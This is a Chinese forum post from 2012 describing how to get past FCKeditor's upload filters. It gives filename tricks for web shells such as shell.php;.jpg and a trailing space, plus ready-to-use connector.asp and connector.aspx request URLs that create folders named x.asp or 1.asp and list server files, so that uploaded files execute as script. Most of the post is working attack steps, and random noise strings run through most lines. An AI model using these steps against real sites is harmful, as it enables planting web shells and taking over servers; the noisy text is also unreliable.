很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg7 V: T# b, T- i5 \/ O5 N
' j2 ~( `. [3 X, F- y/ m5 l8 T提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
. L% h [7 z# r
0 S" t* r( I" |8 a; O O继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
7 [0 s/ X: V4 `3 k* x( J
# y/ E- A, \8 q/ B$ C2 q突破建立文件夹:, t: v: P: }7 g$ W) D$ i! m" O* q
: T O0 ~- n( _0 `3 Q+ X" Yeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
8 c$ h7 {7 r+ I8 n! _: U3 p5 h" b; F" ?0 n4 S) m! n7 E& I7 x
参数:
" `6 w2 k3 Y* ?% N: @. f' p& W
4 J# U& i s* o当前目录名:CurrentFolder=/qing.asp. h5 D4 a6 r. ^$ r1 o3 H: J' }
! ~- b: s4 X6 D3 `
新的目录名:NewFolderName=x.asp
7 S; s- Z8 F% N: \6 ]
+ p; I1 y' R) @& U其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
( F8 v! M% t: f0 G t: \1 p
) b z$ M5 _, o' X( p, x4 Q& x那么 x.asp 就已经建立生成了,此方法百试百灵!) ?! E1 H/ W: ^7 }
' W$ \) t3 k+ O7 W4 e- o& l新建文件夹参数 x.asp,基本都能搞定。/ T. E5 E0 r& y, y: D8 J$ h
( W/ o% w% h: E: Y( U) O" L
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建, ]% P; D; i$ a) q" t. ^& o# U
4 l v( x+ p( X* n& Q+ |aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
3 i6 ^1 G5 r6 y! @3 a9 I5 I% ?7 b) Y3 t7 W( f% R- ~% l
获取文件列表
1 S- A0 D6 `3 E8 W! z! p) E6 i aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
$ E! z$ S, b5 `( ]
+ I( ~( f+ T, a- H, h( n$ m |
发表于 2012-12-31 09:27:09
收藏
支持
反对